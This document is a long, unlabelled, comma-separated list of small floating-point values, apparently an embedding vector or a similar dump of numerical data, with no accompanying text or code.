-0.015844689682126045, 0.0032283004838973284, -0.0016398008447140455, -0.001080985995940864, 0.0020978457760065794, -0.0032228040508925915, 0.015434281900525093, 0.02100410684943199, -0.020212605595588684, 0.03890083730220795, -0.017808785662055016, -0.003166006412357092, 0.025577228516340256, 0.013843949884176254, -0.010025687515735626, -0.0038878852501511574, 0.012334233149886131, -0.0016608708538115025, -0.027717214077711105, -0.006343006156384945, 0.02496161498129368, -0.009080282412469387, 0.014019838534295559, -0.025738460943102837, 0.005218047648668289, 0.0009829644113779068, 0.015067845582962036, -0.007453307043761015, 0.016768109053373337, 0.013851278461515903, -0.02032986655831337, 0.021883554756641388, 0.0024001554120332003, -0.028889808803796768, -0.040014803409576416, 0.018409742042422295, 0.0032136430963873863, -0.020960135385394096, -0.025518598034977913, -0.016211125999689102, 0.03359484672546387, -0.0000849100761115551, -0.009754524566233158, 0.021722322329878807, 0.0023213715758174658, 0.0030762297101318836, -0.009160898625850677, 0.004884590860456228, -0.010699929669499397, -0.013602102175354958, -0.002537568798288703, -0.015756744891405106, 0.030458154156804085, -0.008640559390187263, -0.01802864857017994, 0.004254321102052927, -0.006713106296956539, -0.005481881555169821, 0.015903320163488388, 0.011931153945624828, -0.018395083025097847, 0.006837694440037012, 0.012392863631248474, 0.0019329495262354612, 0.004140725824981928, 0.021736979484558105, 0.005426916293799877, 0.012942517176270485, -0.015786059200763702, 0.021033423021435738, -0.005657770670950413, 0.029182957485318184, -0.004507162142544985, -0.02485901303589344, -0.016782766208052635, -0.010941777378320694, 0.01482599787414074, -0.04936625063419342, 0.025313394144177437, 0.005822666920721531, 0.03426908701658249, -0.019626308232545853, 0.039868228137493134, -0.002094181254506111, -0.0020208940841257572, 0.018321797251701355, 0.0003446787886787206, -0.019201243296265602, -0.026588590815663338, -0.009116926230490208, 0.019802197813987732, -0.0027482695877552032, -0.017544953152537346, 0.024668466299772263, 0.03511922061443329, -0.002724451245740056, 0.017999332398176193, -0.010949105955660343, 0.005294999107718468, -0.010853832587599754, -0.002019061939790845, 0.01879083551466465, -0.010589998215436935, 0.008552614599466324, 0.032070472836494446, 0.004393566865473986, -0.031484175473451614, 0.022763000801205635, -0.009776510298252106, -0.007152829319238663, -0.06079905107617378, -0.012869230471551418, -0.018849464133381844, 0.0015674297465011477, -0.01337491162121296, 0.03136691451072693, -0.013587444089353085, -0.006621497217565775, 0.013352925889194012, -0.007577895186841488, -0.029842542484402657, -0.005742051173001528, 0.004514490719884634, 0.015082502737641335, 0.008105562999844551, -0.016108524054288864, -0.004994521848857403, 0.01537565141916275, -0.00041338554001413286, 0.026852425187826157, -0.03664359450340271, 0.012524779886007309, 0.0010223562130704522, -0.006672798190265894, 0.009937742725014687, -0.025328051298856735, -0.01997808739542961, 0.00965192262083292, 0.013719361275434494, -0.01489928551018238, 0.007244438398629427, -0.004521819297224283, 0.00349213439039886, -0.004796646535396576, -0.005939926486462355, -0.007013583555817604, -0.04030795395374298, 0.0019402782199904323, -0.008735832758247852, 0.012092385441064835, 0.012971832416951656, -0.019670281559228897, 0.016167152673006058, 0.03743509575724602, 0.012121700681746006, -0.0166655071079731, -0.02496161498129368, 0.013704704120755196, -0.02178095281124115, -0.039692338556051254, -0.022763000801205635, 0.005679756868630648, 0.046346817165613174, -0.0009948735823854804, -0.02203012816607952, -0.021590406075119972, -0.015082502737641335, 0.005294999107718468, -0.01673879288136959, -0.023217380046844482, -0.02436066046357155, -0.004507162142544985, 0.01983151212334633, -0.007017248310148716, 0.011572047136723995, 0.006998926401138306, -0.024844355881214142, 0.0035489320289343596, 0.002944312756881118, -0.0010846504010260105, 0.015917977318167686, -0.005218047648668289, -0.04244793951511383, 0.008354739286005497, -0.012546766549348831, 0.008999666199088097, -0.0264713317155838, 0.009241513907909393, 0.01572743058204651, 0.022440535947680473, -0.010963763110339642, 0.013975866138935089, 0.01263471134006977, -0.016445644199848175, -0.009190212935209274, -0.004382573999464512, -0.018497686833143234, 0.005654106382280588, 0.022337934002280235, -0.018644260242581367, -0.02246985211968422, -0.038666319102048874, 0.021590406075119972, -0.0038145980797708035, 0.00561379874125123, -0.0007850889815017581, -0.006903653033077717, -0.001636136439628899, 0.01341155543923378, -0.03717125952243805, 0.024375317618250847, -0.0015802549896761775, -0.014965243637561798, -0.003840248566120863, 0.019333159551024437, -0.0018156900769099593, 0.016724135726690292, -0.026940369978547096, 0.02733612060546875, 0.008603915572166443, -0.040190692991018295, -0.02025657892227173, 0.002427638042718172, -0.029754597693681717, -0.021751636639237404, 0.009344116784632206, -0.011857867240905762, 0.01417374238371849, -0.033184438943862915, 0.017207831144332886, 0.008296109735965729, -0.004785653203725815, 0.025753118097782135, 0.004972535651177168, 0.0011341192293912172, 0.010355479083955288, -0.0175156369805336, 0.004694044124335051, 0.033184438943862915, 0.011484102346003056, -0.004950549453496933, -0.007068549282848835, -0.023730391636490822, -0.03391731157898903, 0.008669874630868435, 0.03385867923498154, 0.03212910145521164, -0.01700262725353241, 0.021824924275279045, 0.0029864527750760317, 0.006907317321747541, 0.0020612021908164024, 0.009725209325551987, -0.011124994605779648, -0.028567345812916756, 0.02144383080303669, -0.01707591488957405, 0.01489928551018238, 0.008662545122206211, -0.014657437801361084, 0.03972165659070015, 0.028977753594517708, 0.03212910145521164, -0.045995038002729416, -0.031572118401527405, 0.035881407558918, -0.017471665516495705, -0.0003591072163544595, 0.01192382536828518, -0.011762593872845173, 0.0027555981650948524, 0.014342302456498146, 0.006507902406156063, 0.00884576328098774, -0.006255061365664005, -0.005980234593153, 0.0055148606188595295, 0.010890476405620575, -0.023598473519086838, 0.0017946199513971806, 0.0005006431019864976, -0.019421104341745377, 0.03136691451072693, 0.04842817410826683, -0.007163822650909424, -0.0006014129612594843, 0.0014190231449902058, -0.006328348536044359, 0.009989043697714806, -0.007812414318323135, 0.00956397783011198, 0.019714253023266792, -0.03262745589017868, 0.012488136999309063, -0.01879083551466465, 0.05106651037931442, -0.01033349335193634, 0.026031609624624252, -0.0006467594066634774, 0.0036350444424897432, -0.028156938031315804, 0.006156123708933592, 0.010443423874676228, -0.00168743752874434, -0.014356959611177444, 0.007643853779882193, -0.014679423533380032, -0.0038439128547906876, -0.017911387607455254, -0.0015674297465011477, -0.007841728627681732, 0.002858200343325734, 0.0209161639213562, 0.0006472174427472055, 0.005273012910038233, -0.0031934892758727074, -0.014657437801361084, 0.027204204350709915, -0.016430987045168877, -0.002323203720152378, 0.0010379297891631722, 0.039252616465091705, -0.008398711681365967, -0.004210348706692457, -0.0044375392608344555, -0.024800384417176247, 0.036936741322278976, -0.01930384524166584, -0.024815041571855545, -0.003499463200569153, -0.028068993240594864, 0.009549320675432682, -0.0008803623495623469, -0.02134122885763645, -0.020051375031471252, -0.033184438943862915, 0.019611651077866554, -0.010084317065775394, -0.0063466704450547695, 0.008259465917944908, 0.0871238112449646, -0.008281451649963856, 0.0022810637019574642, -0.008274123072624207, -0.02417011372745037, 0.024756411090493202, 0.018688233569264412, 0.0029919494409114122, 0.018776176497340202, -0.02965199574828148, 0.019582336768507957, 0.029871856793761253, -0.005207054782658815, 0.014569493010640144, 0.017984675243496895, 0.011857867240905762, -0.028508715331554413, -0.013008475303649902, 0.006236739456653595, 0.0033492243383079767, 0.021736979484558105, 0.016958655789494514, -0.002761094830930233, -0.01546359620988369, 0.022836286574602127, -0.006551874335855246, -0.02204478532075882, -0.013433541171252728, -0.03544168174266815, 0.0006605007802136242, 0.013741347938776016, 0.007526594214141369, -0.011960469186306, -0.01717851683497429, -0.0067094420082867146, 0.005562497302889824, 0.011242254637181759, 0.024492578580975533, -0.02197149768471718, -0.01716385968029499, -0.009102268144488335, -0.023598473519086838, -0.017486322671175003, 0.0030908870976418257, 0.006628826260566711, 0.0032979233656078577, 0.008618572726845741, 0.0011267905356362462, -0.024023540318012238, 0.015448939055204391, -0.02119465358555317, -0.014510862529277802, 0.003501295344904065, 0.007105192635208368, 0.010721915401518345, -0.006031535565853119, -0.018131250515580177, -0.01195314060896635, -0.006405299995094538, -0.019846169278025627, 0.004785653203725815, 0.01127889845520258, -0.016606876626610756, -0.000569807889405638, -0.001294434885494411, -0.00041132434853352606, -0.03450360894203186, -0.008384054526686668, -0.0011826719855889678, 0.011989783495664597, 0.010927119292318821, 0.011997112073004246, -0.007486286107450724, 0.006134137511253357, -0.004690379835665226, -0.015273049473762512, -0.01396853756159544, 0.02119465358555317, -0.026002293452620506, -0.018658917397260666, -0.009285486303269863, 0.0081128915771842, 0.002390994457527995, 0.021649034693837166, 0.0030579078011214733, 0.02510819025337696, -0.02581174671649933, -0.0294761061668396, 0.009190212935209274, -0.02238190732896328, -0.029842542484402657, 0.004741680808365345, 0.02724817581474781, -0.016460301354527473, 0.007563237566500902, 0.036702223122119904, 0.0015262056840583682, -0.020798902958631516, -0.01887877844274044, -0.017207831144332886, 0.017559610307216644, 0.011293555609881878, 0.004661065060645342, -0.011007735505700111, -0.020110003650188446, 0.0001687895564828068, -0.012751970440149307, 0.005005514714866877, -0.013902579434216022, -0.008860420435667038, -0.0014171910006552935, -0.02314409427344799, -0.00045758686610497534, -0.015214419923722744, -0.008413368836045265, 0.009278157725930214, -0.009974386543035507, 0.004455861169844866, -0.009388088248670101, -0.03555894270539284, -0.02204478532075882, 0.010164933279156685, 0.002455120673403144, -0.036702223122119904, 0.01490661408752203, 0.019626308232545853, 0.03573483228683472, -0.02768789976835251, 0.023114778101444244, 0.006702113430947065, 0.012348891235888004, 0.005371950566768646, 0.03596935048699379, 0.0034078541211783886, 0.007167486939579248, -0.023349298164248466, 0.0009463208261877298, 0.01537565141916275, 0.0008336417376995087, 0.009160898625850677, 0.000599580816924572, -0.0011386997066438198, -0.0045401412062346935, 0.017706183716654778, 0.005276677664369345, 0.009080282412469387, 0.007519265171140432, 0.0014547506580129266, 0.02298286184668541, 0.024565864354372025, 0.019758226349949837, -0.019611651077866554, 0.0024019875563681126, 0.004008809104561806, 0.005635784473270178, -0.01657756231725216, 0.008208164945244789, -0.013799977488815784, 0.0010864825453609228, 0.012920531444251537, 0.00812022015452385, 0.023730391636490822, 0.011242254637181759, -0.020696301013231277, -0.005382943898439407, 0.04127534478902817, -0.013264981098473072, 0.003964836709201336, -0.0132356658577919, 0.01829248107969761, 0.014063810929656029, -0.004049117211252451, -0.026793794706463814, -0.005665099713951349, -0.007116185966879129, 0.030194321647286415, 0.0024074839893728495, 0.017457008361816406, 0.028479401022195816, -0.012664025649428368, 0.02289491705596447, 0.007563237566500902, 0.019596993923187256, 0.011513416655361652, -0.0033015876542776823, 0.015082502737641335, 0.016885368153452873, 0.0017698855372145772, -0.03752303868532181, 0.011579375714063644, 0.017632897943258286, 0.025049559772014618, -0.01499455887824297, -0.01880549266934395, 0.012766627594828606, -0.039750970900058746, 0.003920864313840866, -0.02186889573931694, -0.0006087417132221162, -0.01964096538722515, -0.012568752281367779, -0.020608356222510338, 0.012407520785927773, 0.004225006327033043, 0.007394677028059959, -0.04482244327664375, -0.010047673247754574, 0.01698797009885311, 0.0027592626865953207, 0.02230861969292164, 0.0029846206307411194, -0.013462856411933899, -0.001798284356482327, 0.0034023576881736517, 0.035148534923791885, -0.007152829319238663, -0.011205610819160938, -0.03766961395740509, 0.0022462522611021996, 0.00973253883421421, 0.00815686397254467, -0.01200444158166647, -0.004609764087945223, 0.005097123794257641, -0.026632564142346382, -0.009534662589430809, 0.023334641009569168, -0.030516784638166428, 0.003550764173269272, 0.004400895442813635, -0.027951732277870178, -0.02068164385855198, 0.004290964920073748, 0.008567271754145622, -0.00029429385904222727, -0.0034591553267091513, 0.00032452482264488935, -0.0041773696430027485, -0.0017222488531842828, 0.0006041612359695137, 0.015038530342280865, -0.011733278632164001, -0.03192389756441116, -0.0007631028420291841, 0.0011954972287639976, -0.00032566994195804, 0.0005794268217869103, 0.023188065737485886, -0.003983158618211746, 0.007915016263723373, -0.008127548731863499, -0.005720064975321293, 0.006079172249883413, -0.01247347891330719, -0.009952399879693985, -0.013470184989273548, 0.007907687686383724, -0.028332825750112534, -0.012810599990189075, -0.0269110556691885, 0.051975272595882416, -0.02828885428607464, -0.0022773994132876396, 0.027130916714668274, -0.04159780591726303, 0.021898211911320686, -0.028743235394358635, -0.004181033931672573, -0.0102455485612154, 0.0032228040508925915, -0.002880186541005969, 0.008721175603568554, -0.0036350444424897432, -0.017999332398176193, -0.0038732278626412153, -0.000469954073196277, 0.0006852351943962276, -0.0126053960993886, -0.03658496215939522, 0.013133063912391663, 0.007152829319238663, 0.0529426634311676, 0.015038530342280865, -0.018483027815818787, -0.002205944387242198, -0.0005487378221005201, -0.04716763272881508, 0.015390309505164623, -0.0239062812179327, -0.017632897943258286, 0.003957508131861687, -0.019347816705703735, 0.006507902406156063, -0.0333016961812973, 0.013470184989273548, -0.0035232815425843, -0.01786741614341736, 0.024844355881214142, 0.0074239918030798435, -0.006049857474863529, 0.009901098906993866, 0.03110308200120926, 0.00952733401209116, -0.010502053424715996, 0.010201576165854931, 0.00318249617703259, -0.024815041571855545, -0.01396120898425579, -0.010172261856496334, -0.0030450825579464436, -0.013001146726310253, -0.004818632733076811, -0.03382936492562294, 0.008574601262807846, 0.0025302402209490538, -0.020359180867671967, -0.035500314086675644, 0.0005885877180844545, -0.024741753935813904, 0.02008068934082985, -0.012737313285470009, -0.008259465917944908, -0.025591885671019554, -0.0029021725058555603, -0.029769254848361015, -0.006676462944597006, -0.0028160600923001766, 0.007314061280339956, -0.020022058859467506, -0.020197948440909386, 0.035910721868276596, -0.004855276085436344, 0.019699595868587494, 0.00480763940140605, -0.01336758304387331, 0.006009549368172884, 0.014811340719461441, 0.010685271583497524, -0.00018630977137945592, -0.0012541270116344094, -0.029021725058555603, 0.0350019596517086, -0.00035979427048005164, -0.0008469250751659274, 0.01648961752653122, 0.00819350779056549, 0.0024258058983832598, 0.0024990930687636137, -0.01111033745110035, -0.02887515164911747, -0.022513823583722115, 0.013616759330034256, 0.006478587165474892, 0.009798496961593628, -0.0020007402636110783, 0.02417011372745037, 0.00888240709900856, -0.0014813172165304422, 0.020901504904031754, -0.022103415802121162, -0.014613465406000614, -0.011769922450184822, -0.00450349785387516, 0.0071968017145991325, 0.004730687942355871, -0.027189547196030617, -0.008186179213225842, -0.000562937231734395, 0.010179590433835983, 0.01785275898873806, 0.02912432886660099, -0.011359513737261295, 0.013140392489731312, -0.014584150165319443, -0.0026896398048847914, 0.0016681995475664735, 0.024316688999533653, -0.026676535606384277, -0.02938816137611866, 0.015009216032922268, -0.0147380530834198, 0.00158483546692878, -0.014576821587979794, -0.018409742042422295, -0.009087610989809036, -0.0020208940841257572, -0.010993078351020813, -0.02956405095756054, -0.013550801202654839, -0.02708694338798523, 0.016606876626610756, 0.012810599990189075, 0.017237145453691483, 0.043532587587833405, -0.009314801543951035, -0.006694784387946129, -0.015258392319083214, 0.013001146726310253, -0.01499455887824297, -0.0035049596335738897, 0.002286560134962201, -0.03312580659985542, 0.00207219528965652, 0.016694821417331696, 0.012759299017488956, -0.0007388264639303088, -0.0222206749022007, -0.02066698670387268, 0.023334641009569168, -0.0027262833900749683, 0.009454047307372093, 0.005320649594068527, -0.02290957421064377, -0.03725920617580414, -0.025474626570940018, -0.016504274681210518, -0.0051007880829274654, 0.03893015533685684, 0.0426824577152729, -0.02288025990128517, 0.009248843416571617, -0.021986156702041626, -0.007885701023042202, -0.03277403116226196, -0.02682311087846756, -0.006771735846996307, -0.01861494593322277, 0.0035709182266145945, -0.01829248107969761, 0.012971832416951656, -0.004243328236043453, -0.012158344499766827, 0.004584113601595163, -0.005199725739657879, 0.00275376602075994, 0.010846504010260105, -0.00798097439110279, -0.003596568712964654, -0.020784245803952217, 0.00559547683224082, 0.009366102516651154, 0.007207795046269894, 0.007398341316729784, -0.007607209961861372, 0.013946551829576492, 0.0006440111319534481, -0.016885368153452873, -0.0006220249924808741, -0.008860420435667038, -0.0209161639213562, 0.020476439967751503, -0.016460301354527473, 0.010546025820076466, 0.011887181550264359, -0.004049117211252451, 0.0051117814145982265, 0.004063774365931749, 0.005654106382280588, 0.006976940203458071, -0.010062330402433872, 0.014877298846840858, -0.005767701659351587, 0.008479327894747257, -0.014027167111635208, 0.023876965045928955, 0.006672798190265894, 0.0017213327810168266, -0.005738386884331703, -0.00957130640745163, -0.012194988317787647, 0.011542731896042824, -0.0014318483881652355, 0.013528814539313316, 0.0036515339743345976, 0.005606469698250294, -0.008398711681365967, -0.015141133219003677, -0.01974356733262539, 0.01187985297292471, 0.010326164774596691, 0.015170447528362274, 0.026339415460824966, -0.002315875142812729, -0.0040198019705712795, -0.00045163228060118854, -0.002376337070018053, 0.005005514714866877, -0.004653736483305693, 0.009776510298252106, -0.02135588601231575, -0.010611984878778458, -0.03083924762904644, 0.007702483329921961, -0.0017478994559496641, 0.013536143116652966, 0.0018074451945722103, 0.012238959781825542, 0.01827782392501831, 0.006273383274674416, 0.0030066068284213543, -0.004481511656194925, -0.008384054526686668, -0.0034371691290289164, -0.008142206817865372, 0.01597660593688488, 0.007761112879961729, -0.02263108268380165, 0.012319575995206833, 0.016694821417331696, -0.006310026627033949, 0.0034829736687242985, -0.0026071916799992323, -0.008362067863345146, -0.0019036346348002553, -0.0051520890556275845, 0.010128289461135864, -0.0008675370481796563, 0.00051804882241413, -0.013484842143952847, -0.0013704703887924552, -0.014496205374598503, 0.00013638287782669067, 0.0222060177475214, -0.00709053548052907, -0.011945811100304127, -0.0008565440075471997, 0.0037779544945806265, -0.020461782813072205, -0.009805825538933277, -0.013074434362351894, 0.0029498091898858547, 0.009080282412469387, -0.0063979714177548885, -0.017398377880454063, 0.0264859888702631, -0.008581929840147495, 0.02913898602128029, -0.019274530932307243, 0.0062953694723546505, -0.01204841397702694, 0.003964836709201336, -0.0004209432809147984, 0.012202316895127296, 0.0034683160483837128, -0.0015197930624708533, -0.010707258246839046, 0.014664766378700733, -0.019289188086986542, -0.03271539881825447, 0.008054262027144432, 0.01412976998835802, 0.013521485961973667, 0.012935188598930836, -0.0039025426376610994, -0.016709478572010994, -0.007783099077641964, -0.004639078862965107, 0.012312247417867184, 0.00040491169784218073, -0.015082502737641335, 0.0031128732953220606, 0.019098641350865364, 0.013975866138935089, 0.017984675243496895, 0.0038695635739713907, 0.018057962879538536, -0.004829625599086285, -0.023466557264328003, -0.003997816238552332, -0.02384765073657036, 0.001087398617528379, -0.0044045597314834595, -0.007966317236423492, 0.001723164925351739, 0.003818262368440628, -0.002554058562964201, 0.0052876705303788185, 0.0046977088786661625, -0.005280341953039169, 0.0004319363506510854, 0.010443423874676228, 0.017237145453691483, -0.01114698126912117, -0.0062110889703035355, -0.019201243296265602, -0.006430950481444597, -0.01332361064851284, -0.011777251027524471, -0.00007471857679774985, -0.006724099162966013, 0.02613421157002449, -0.001723164925351739, -0.022440535947680473, 0.029945144429802895, -0.005075137596577406, -0.005815338343381882, -0.03517784923315048, -0.0066801272332668304, -0.001732325879856944, 0.017193173989653587, 0.01647496037185192, 0.008977680467069149, 0.004858940374106169, -0.006848687771707773, -0.01580071821808815, -0.008054262027144432, 0.005437909159809351, -0.01726646162569523, 0.0034444977063685656, 0.0070428987964987755, 0.014488876797258854, -0.005716400686651468, -0.009043638594448566, -0.0033144131302833557, -0.003810933791100979, -0.01414442714303732, -0.030106376856565475, -0.004609764087945223, -0.012707998044788837, -0.021209312602877617, 0.0019072990398854017, -0.006540881469845772, 0.00022146472474560142, -0.005262020044028759, 0.014913942664861679, 0.006592182442545891, 0.011418143287301064, -0.013799977488815784, -0.001162518048658967, 0.0209308210760355, 0.009087610989809036, -0.004371580667793751, -0.0034005255438387394, -0.001064496347680688, -0.002235259162262082, 0.020139319822192192, -0.011242254637181759, 0.017999332398176193, -0.025899691507220268, -0.013081762939691544, -0.0021070067305117846, -0.021414516493678093, -0.015844689682126045, -0.01707591488957405, -0.03110308200120926, 0.009175555780529976, 0.013301623985171318, -0.011850537732243538, 0.007849058136343956, 0.024375317618250847, -0.008735832758247852, 0.007233445532619953, -0.02110671065747738, 0.0022737348917871714, 0.0023488544393330812, -0.010524040088057518, -0.008625902235507965, 0.008450012654066086, 0.009915756061673164, 0.012444164603948593, -0.0030432504136115313, 0.012751970440149307, -0.018776176497340202, -0.004639078862965107, 0.00021768585429526865, -0.0015371987828984857, -0.02204478532075882, 0.011073693633079529, -0.006742421071976423, 0.009344116784632206, 0.020359180867671967, 0.006130473222583532, -0.024844355881214142, -0.013001146726310253, -0.00802494678646326, -0.01482599787414074, 0.009857126511633396, 0.009212199598550797, -0.0038512416649609804, 0.006306362338364124, -0.016592219471931458, 0.00480763940140605, -0.003316245274618268, 0.007039234507828951, -0.001568345818668604, 0.0020172297954559326, -0.003041418269276619, -0.008743161335587502, -0.007376355584710836, 0.0005936262314207852, 0.00313852378167212, 0.015522225759923458, 0.014415590092539787, -0.005492874421179295, -0.0069696116261184216, -0.03749372437596321, -0.014400932006537914, 0.01843905635178089, -0.029959801584482193, 0.013213680125772953, 0.01811659336090088, 0.004877262283116579, -0.0006403467850759625, -0.0036002330016344786, -0.005606469698250294, -0.006005885079503059, 0.0012669522548094392, 0.0003316245274618268, 0.01122759748250246, -0.0010012862039729953, 0.009835140779614449, -0.006867009215056896, 0.029153643175959587, 0.005093459505587816, -0.011542731896042824, 0.01871754787862301, -0.009417403489351273, 0.01946507766842842, 0.019274530932307243, 0.004778324626386166, -0.02307080663740635, 0.007347040344029665, 0.02197149768471718, -0.020373838022351265, 0.004694044124335051, 0.0056724282912909985, 0.03382936492562294, -0.005969241261482239, -0.018072620034217834, -0.005492874421179295, 0.006929303519427776, 0.013257652521133423, 0.018043305724859238, -0.007416663225740194, -0.000019452594642643817, -0.0026988007593899965, 0.013638745062053204, -0.02938816137611866, -0.005316985305398703, -0.02282162941992283, 0.016005922108888626, 0.020696301013231277, -0.009314801543951035, 0.007189473137259483, 0.004474182613193989, 0.010568012483417988, 0.0034005255438387394, -0.017222488299012184, 0.00015401760174427181, 0.0047490098513662815, -0.01588866300880909, 0.016035236418247223, -0.018057962879538536, -0.01990479975938797, 0.021883554756641388, 0.0018147740047425032, -0.014723395928740501, 0.012927860021591187, 0.005789687857031822, 0.011945811100304127, 0.009769181720912457, 0.030956508591771126, 0.0031953214202076197, 0.023964909836649895, 0.020564384758472443, 0.013668060302734375, 0.0029662989545613527, 0.004734352231025696, -0.006566531956195831, -0.013668060302734375, -0.014833326451480389, 0.017105229198932648, 0.021473145112395287, -0.004946885164827108, 0.015317021869122982, 0.01716385968029499, 0.004565791692584753, -0.010758559219539165, -0.0033657141029834747, -0.02716023102402687, -0.018424399197101593, -0.004137061536312103, -0.004455861169844866, 0.005276677664369345, 0.033624161034822464, 0.002788577461615205, -0.004745345562696457, -0.0070465630851686, 0.02144383080303669, -0.012788614258170128, 0.016548246145248413, -0.007695154752582312, 0.009791168384253979, -0.0018633267609402537, -0.005540511105209589, -0.029358847066760063, 0.015404966659843922, 0.007731798104941845, -0.009776510298252106, 0.0023561830166727304, -0.010142946615815163, -0.037464410066604614, -0.017061257734894753, 0.005034829955548048, 0.013037790544331074, 0.01119095366448164, 0.012883887626230717, 0.005276677664369345, 0.0017634729156270623, 0.0020465448033064604, -0.0147380530834198, -0.001768053392879665, -0.029021725058555603, 0.003010271117091179, -0.004250656813383102, 0.017061257734894753, -0.01717851683497429, -0.011755264364182949, 0.01852700114250183, -0.008061590604484081, -0.007277417462319136, -0.024844355881214142, 0.022689713165163994, -0.0006980604375712574, 0.015434281900525093, -0.01482599787414074, -0.008684531785547733, -0.03312580659985542, 0.009065625257790089, -0.02588503435254097, -0.00040880509186536074, -0.004030795302242041, 0.005324314348399639, -0.00023154170776251704, -0.010663285851478577, -0.014972572214901447, -0.017046600580215454, -0.006779064889997244, -0.0055478401482105255, -0.010370137169957161, -0.0392819307744503, 0.0021179995965212584, 0.006474922876805067, 0.001213819021359086, -0.03338964283466339, -0.020007401704788208, -0.0030084389727562666, -0.006112151313573122, -0.003737646620720625, -0.023774363100528717, 0.006064514629542828, -0.006724099162966013, -0.0034005255438387394, 0.014415590092539787, 0.0043789092451334, 0.0031421880703419447, 0.007068549282848835, -0.0222060177475214, -0.03321375325322151, -0.0014071139739826322, 0.006013213656842709, 0.003766961395740509, 0.030018432065844536, 0.005819002632051706, 0.012011770159006119, -0.019201243296265602, -0.002019061939790845, 0.0062440684996545315, -0.02666187845170498, -0.010721915401518345, 0.026969684287905693, -0.009578634984791279, -0.011330199427902699, 0.01717851683497429, 0.0063466704450547695, -0.015273049473762512, -0.006009549368172884, 0.003898878348991275, -0.024038197472691536, 0.01760358177125454, 0.012436836026608944, 0.009556649252772331, -0.006463930010795593, 0.02331998199224472, -0.000016460990082123317, -0.0008084492874331772, -0.0040014805272221565, 0.003862234763801098, 0.0004891919670626521, -0.020549727603793144, -0.019186586141586304, 0.007885701023042202, -0.0316307507455349, 0.014437575824558735, 0.016621533781290054, -0.006738756783306599, 0.0022920568007975817, -0.0069696116261184216, 0.0005125522729940712, 0.008655216544866562, -0.009629935957491398, 0.005734722595661879, 0.011300884187221527, 0.027306806296110153, 0.0192305576056242, 0.017325090244412422, 0.0016407169168815017, -0.009805825538933277, 0.020623015239834785, 0.00013523775851354003, 0.004990857560187578, 0.02563585713505745, 0.022499166429042816, 0.0036606949288398027, 0.00798097439110279, 0.00482596131041646, -0.01267868373543024, -0.002596198581159115, 0.0023836656473577023, 0.004518155008554459, 0.018893437460064888, 0.009842469356954098, -0.0004896500031463802, 0.00556982634589076, 0.0007374522974714637, 0.007251766975969076, 0.018937408924102783, -0.013902579434216022, -0.01179190818220377, -0.0002775752218440175, 0.0046244217082858086, 0.004206684418022633, 0.0038805564399808645, 0.000644469226244837, -0.03714194521307945, 0.020725617185235023, -0.0019256208324804902, -0.021824924275279045, 0.0002537568798288703, -0.01656290329992771, 0.0003900252340827137, 0.00621475325897336, 0.005379279609769583, -0.00893370807170868, -0.017105229198932648, -0.020110003650188446, -0.00225174892693758, 0.007958988659083843, 0.03640907257795334, 0.0048406184650957584, -0.020139319822192192, 0.0007988303550519049, -0.027145573869347572, -0.0011341192293912172, -0.023114778101444244, -0.01242950651794672, -0.020872190594673157, 0.033448271453380585, -0.00025444396305829287, -0.023378612473607063, -0.009959728457033634, 0.018321797251701355, -0.010011029429733753, 0.013785319402813911, 0.016299070790410042, -0.005298663396388292, -0.0341518297791481, 0.000045604097977047786, 0.0005560665158554912, 0.010633970610797405, 0.007966317236423492, 0.007178479805588722, 0.009585964493453503, -0.02271902747452259, 0.026075581088662148, 0.010773216374218464, 0.0005084298318251967, -0.0050788018852472305, -0.028083650395274162, 0.009080282412469387, -0.016973312944173813, -0.005298663396388292, -0.012971832416951656, -0.000024505403416696936, -0.01946507766842842, -0.016035236418247223, -0.004598770756274462, 0.013668060302734375, 0.026500646024942398, -0.009300144389271736, -0.014364288188517094, -0.020139319822192192, 0.018483027815818787, -0.0015875836834311485, 0.01596194878220558, -0.0264713317155838, 0.029622681438922882, -0.008479327894747257, -0.0002587953640613705, -0.029681310057640076, 0.010172261856496334, -0.01758892461657524, -0.005738386884331703, 0.023525187745690346, 0.000006384001153492136, -0.0063136909157037735, 0.0028307174798101187, -0.007281082216650248, -0.0032521188259124756, -0.00408209627494216, 0.011410814709961414, 0.010663285851478577, 0.005467223934829235, 0.025386681780219078, 0.008545286022126675, 0.012810599990189075, -0.028406113386154175, 0.017984675243496895, 0.01315504964441061, -0.0014547506580129266, -0.019934114068746567, 0.00888240709900856, 0.006152459420263767, 0.0012028259225189686, -0.01931850239634514, 0.0027482695877552032, -0.013492170721292496, -0.029095012694597244, 0.03168937936425209, 0.016372358426451683, -0.003898878348991275, 0.0040417881682515144, 0.0066068400628864765, 0.013609430752694607, 0.011051707901060581, 0.02195684053003788, -0.009842469356954098, 0.0067314282059669495, -0.0019146277336403728, 0.010436095297336578, -0.005218047648668289, -0.01854165829718113, -0.04417751729488373, 0.020520411431789398, 0.005291334819048643, -0.006390642840415239, -0.039604395627975464, -0.00128710619173944, 0.007310396991670132, 0.0032741050235927105, -0.010912462137639523, -0.008486656472086906, -0.016299070790410042, -0.01337491162121296, 0.008083576336503029, 0.02170766517519951, 0.009263500571250916, 0.013616759330034256, 0.015346337109804153, 0.002042880281805992, -0.019083984196186066, -0.026266127824783325, 0.0032741050235927105, -0.008442684076726437, 0.0034756448585540056, 0.0006082836771383882, -0.00824480876326561, -0.006614168640226126, -0.0021876224782317877, 0.0055148606188595295, 0.0179260466247797, 0.016269754618406296, -0.006518895272165537, -0.0009078450384549797, 0.008442684076726437, -0.011132324114441872, -0.03391731157898903, -0.01315504964441061, 0.01604989357292652, -0.025782432407140732, -0.02427271567285061, -0.008501313626766205, 0.02340792678296566, 0.011051707901060581, -0.0069879330694675446, -0.0006632490549236536, 0.004206684418022633, 0.008376725018024445, 0.005811674054712057, 0.014635451138019562, -0.010230891406536102, -0.004078431986272335, -0.012861900962889194, -0.0023708404041826725, -0.0012119868770241737, -0.01097109168767929, 0.026280784979462624, 0.008728504180908203, 0.02197149768471718, -0.03611592575907707, -0.019626308232545853, 0.016870710998773575, 0.010927119292318821, 0.03218773379921913, -0.02296820469200611, 0.009410074912011623, -0.033624161034822464, 0.0024019875563681126, 0.003803604980930686, -0.003395028878003359, -0.01264936849474907, 0.010128289461135864, -0.012627381831407547, 0.003796276170760393, -0.0234958715736866, 0.016636190935969353, 0.0016269756015390158, -0.023613130673766136, -0.008977680467069149, -0.013382240198552608, -0.002671317895874381, -0.010011029429733753, 0.024902986362576485, -0.011293555609881878, 0.029505422338843346, -0.021326571702957153, 0.008230150677263737, 0.0031953214202076197, 0.02827419713139534, -0.0077171409502625465, 0.0029644668102264404, -0.021062737330794334, -0.017735499888658524, 0.012129029259085655, 